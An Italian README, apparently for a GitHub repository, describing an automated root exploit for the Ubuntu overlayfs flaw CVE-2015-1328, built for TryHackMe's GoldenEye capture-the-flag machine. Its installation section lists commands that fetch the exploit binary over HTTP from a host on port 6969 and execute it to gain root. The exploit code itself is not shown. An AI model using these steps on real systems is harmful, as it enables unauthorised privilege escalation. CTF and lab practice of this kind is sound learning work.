
Exploit automatizzato di escalation dei privilegi locale per CVE-2015-1328 che prende di mira overlayfs su Ubuntu, progettato per ambienti CTF con un semplice script di deployment bash.
L'implementazione di overlayfs nel pacchetto linux (noto come kernel Linux) precedente alla versione 3.19.0-21.21 in Ubuntu fino alla 15.04 non controlla correttamente i permessi per la creazione di file nella directory del filesystem superiore, consentendo agli utenti locali di ottenere accesso root sfruttando una configurazione in cui overlayfs è permesso in un namespace di mount arbitrario.
Grazie a rebel
Questo è un exploit automatizzato per CVE-2015-1328 per la CTF GoldenEye di TryHackMe. Per impostazione predefinita, gcc non è disponibile su quella macchina, quindi ho configurato gcc come cc e di conseguenza ho eseguito l'exploit per ottenere privilegi di root.
Installazione
Basta clonare questo repository -
$ git clone https://github.com/elit3pwner/CVE-2015-1328-GoldenEye.git
$ cd CVE-2015-1328-GoldenEye
$ chmod +x exploit.sh
$ bash exploit.sh
$ wget http://<target ip>:6969/exploit
$ chmod +x exploit
$ ./exploit